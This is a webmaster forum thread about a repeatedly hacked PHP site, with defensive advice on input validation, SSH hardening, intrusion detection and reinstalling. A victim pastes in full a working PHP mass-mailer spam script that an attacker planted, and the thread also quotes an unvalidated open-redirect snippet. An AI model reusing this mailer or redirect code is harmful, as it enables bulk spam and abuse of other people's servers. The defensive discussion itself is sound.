My site was suspended because someone attacked the site. This was the third time. I have changed my CPanel passwords and close my cgi-bin directory as well as many forms for submission last time, but it was still attacked. I highly doubted it is a guy who tries to compete the top position in google index did this. My site is listed in the first position for a good search term, while his is in the second position. Once he contacted me to list his site in one of my link page, i decelined him because his site is really crappy and a type of MFA. I just wonder if this causes him to attack my site to make it disppear in the google index then his site become top one. I wonder how I can prevent this. By the way, I wrote the scripts by myself. I wonder if there is any free software to detect the flaws in my scripts.
When writing scripts intended to be exposed to anonymous users, security must be uppermost in your mind. Start reading immediately. Start searching for known vulnerabilities for your scripting language of choice and implement fixes. Always initialize variables before they are used the first time to safe, known values. Always normalize all input from users and the internet before saving it into a local variable and storing it in databases or redisplaying it to the web. This includes URL strings, cookies, etc. For instance, when I want data on a form to be a single email address . . . I reject anything that does fit the pattern of a single email address and I convert all unwanted characters to a safe character. If I want a number, I reject all inpout that is not numbers. If input is supposed to be a certain length, I cut it down to the desired length. If you are using PHP, you can block any form of injection into any of the GLOBAL variables. In fact, I believe you should be preventing such things as a matter of policy . . . irrespective of how your php.ini file is configured. If your site was properly hacked, then the attacker has copies of your scripts. They know better than you how to exploit them to take down your site. Never locate which are not intended to be viewed from the web in poublicly accessible directories. Remember, your script can read files outside the web directory hierarchy to retrieve configuration and initialization details. At a minimum, password protect include directories. Your script can reach inside when it needs to . . . but no one else should be able to Use massively difficult, very long, random name and password combinations for those directories. Ones you could never guess. You want to access them locally or through cPanel, not ordinary web queries! Security is simple. DO NOT trust anyone. NEVER trust data received from the internet.
Many thanks for detailed explaination. Please see my following code, would that code of $_GET in php cause some security problem? " $url=trim($_GET["url"]); header("Location: $url"); "
Some hacker installed the following script and sent mass mail through my site. Damn! Anyone has any comments on how to prevent this. Now i have deleted the script from my directory. But it has been the second time. I think that guy must have found some flaws in my scripts and keep on doing this. " Chuks Is Great <? If ($action=="mysql"){ #Grab email addresses de MySQL include "./mysql.info.php"; if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){ print "Porfavor configure su mysql.info.php en tu MySQL informacion. Todas las opciones requeridas."; exit; } $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Conexion en MySQL Fallida."); mysql_select_db($sqldb, $db) or die("Seleecione su DataBase $sqldb"); $result = mysql_query($sqlquery) or die("Secion fallida: $sqlquery"); $numrows = mysql_num_rows($result); for($x=0; $x<$numrows; $x++){ $result_row = mysql_fetch_row($result); $oneemail = $result_row[0]; $emaillist .= $oneemail."\n"; } } if ($action=="send"){ $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?> <form name="form1" method="post" action="" enctype="multipart/form-data"> <br> <table width="100%" border="0"> <tr> <td width="10%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Mail:</font></div> </td> <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="from" value="<? print $from; ?>" size="30"> </font></td> <td width="31%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font></div> </td> <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="realname" value="<? print $realname; ?>" size="30"> </font></td> </tr> <tr> <td width="10%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Repit:</font></div> </td> <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="replyto" value="<? print $replyto; ?>" size="30"> </font></td> <td width="31%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Upload Txt:</font></div> </td> <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="file" name="file" size="30"> </font></td> </tr> <tr> <td width="10%"> <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> </td> <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="subject" value="<? print $subject; ?>" size="90"> </font></td> </tr> <tr valign="top"> <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="message" cols="60" rows="10"><? print $message; ?></textarea> <br> <input type="radio" name="contenttype" value="plain"> Plain <input type="radio" name="contenttype" value="html" checked> HTML <input type="hidden" name="action" value="send"> <input type="submit" value="Send Emails"> </font></td> <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> </font></td> </tr> </table> </form> <? if ($action=="send"){ if (!$from && !$subject && !$message && !$emaillist){ print "Porfavor complete todo lo necesario."; exit; } $allemails = split("\n", $emaillist); $numemails = count($allemails); #Open the file attachment if any, and base64_encode it for email transport If ($file_name){ @copy($file, "./$file_name") or die("El archivo que intestaste subir al servidor, no puede ser copiado"); $content = fread(fopen($file,"r"),filesize($file)); $content = chunk_split(base64_encode($content)); $uid = strtoupper(md5(uniqid(time()))); $name = basename($file); } for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to......."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "ok<br>"; flush(); } } } ?> <p align="center"><b>The Fear Of Efcc & Fbi Is The Beginning Of Stupidity</b></p> It's Not Our Intention Of Doing It. </b></p> But We Have To In Order To Survive</b></p> Keep On Bro</b></p> By Chuks Alias Unix Crew Team "
OMG . . . . he owns you! If you need to, talk to your ISP about all methods by which someone can access your website and fix them. The most obvious is cPanel. You have changed your passwords, so I doubt this is the access route. But, change them again. And review who can access the cPanel and make sure there is no active guest or demo account. Secondly, do you have SSH access? If so, you need to limit access to yourself and you need to change the password. In the /etc/ssh/sshd_config file make sure you do not allow root logon and explicitly list people who are allowed access and for good measure explicitly list those who are not. For instance: PermitRootLogin no DenyUsers user admin guest apache beach bin daemon mysql AllowUsers zipdisk If you do not offer FTP, make sure the FTP daemon is turned off. In fact, make sure all unecessary services are turned off. You should be able to do that from cPanel. Never use FTP to upload files to websites. Always use SSH. Once you have locked down all access routes into your machine, put your website into "Under Repair" mode and carefully review each and every script that you run. There are a couple of security projects around -- I host a small open source one and there is a very good one from an ex member of the PHP security team called Suhosin. Use one or other. I use both. Go through your scripts with a fine toothed comb. The first thing you want to do is make sure all user input is properly checked to make sure it is only something that you would allow. Secondly, only allow direct access to scripts which directly send information back to the screen. You can specifically deny direct access to other scripts in an otherwise accessible location as follows: Put these lines in the public script: define( '_VALID_ZIPDISK', 1 ); Put these in scripts called or included by the public script: defined( '_VALID_ZIPDISK' ) or die( 'Unexpected server error' ); These tips should help get things back under control.
You should try snort but,if you have to own a server for this.And of course you need a little exp with snort and nix systems
Once your box has been compromised, the best starting point is a fresh installation. Cold, harsh truth I'm afraid. How do you know this person did not back door one of the binaries? Other things you might wish to consider are: - Check out how to sanitise input in your PHP scripts; - Make sure you are running the latest rev of OS and apps - if not the latest, then the rev that contains all applicable security patches; - Run cron jobs to check sha1 hashes of all binaries and exectuables regulary against known good copies (look at mtree and alike); - Run cron jobs to check file permission changes; - use .htaccess as necessary to deny file/directory access; - Keep your file permissions tight, especially in your DOC_ROOT - you should never have world writeable files (despite what script README files say); - Turn off all unnecessary services; - Set up a local packet filter; - Consider chrooting apache, php, mysql; - Drop FTP altogether (if you have to use it use vsftpd), use ssh/sftp for file transfers; - Learn how to admin a box without cPanel and dump it; - Harden mySQL and Apache (in addition to PHP as suggested above); etc. etc. This place will be your best friend: http://www.securityfocus.com/ Cheers,
well, with this code the hacker can import a Shell by linking it to your site( a shell is a writen program in PHP that does allmost anything when its loaded on yours site ) another thing you might wanna do is check your folders if thiers any unknown files, because the hacker might of uploaded a Shell code file and hid it some where.